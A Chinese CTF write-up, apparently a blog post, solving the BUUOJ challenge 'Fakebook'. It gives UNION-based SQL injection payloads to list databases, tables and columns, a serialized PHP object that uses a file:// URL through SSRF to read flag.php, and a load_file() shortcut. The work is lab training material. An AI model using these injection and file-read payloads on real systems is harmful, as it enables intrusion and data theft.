[buuoj][网鼎杯 2018]Fakebook

知识点:

  • SSRF(Server-side Request Forge, 服务端请求伪造)
    是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统.

复现:
扫描目录,发现robots.txt
访问:
在这里插入图片描述
发现源码泄露:
在这里插入图片描述
发现ssrf漏洞,其中用到的url就是我们注册时填写的blog

首先先注册登录,发现页面view.php?no=1存在注入
构造:

view.php?no=0 order by 5#1,2,3,4

5时报错,一共4行
查数据库:

view.php?no=0/**/union/**/select 1,group_concat(schema_name),3,4 from information_schema.schemata#

在这里插入图片描述
查表:

view.php?no=0/**/union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'#

在这里插入图片描述
查列:

view.php?no=0/**/union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'#

在这里插入图片描述
查看data:

view.php?no=0/**/union/**/select 1,data,3,4 from users#

在这里插入图片描述
看到这里的data数据是被序列化的,反序列化后是我们注册的信息
因为存在flag.php,我们尝试用file://协议来读取一下/var/www/html/flag.php

view.php?no=0/**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#

在这里插入图片描述
看到网页源码是返回了base64
解码得到flag

非预期解:
这题的sql并没有过滤load_file
直接构造:

view.php?no=0/**/union/**/select 1,load_file('/var/www/html/flag.php'),3,4#

直接得flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值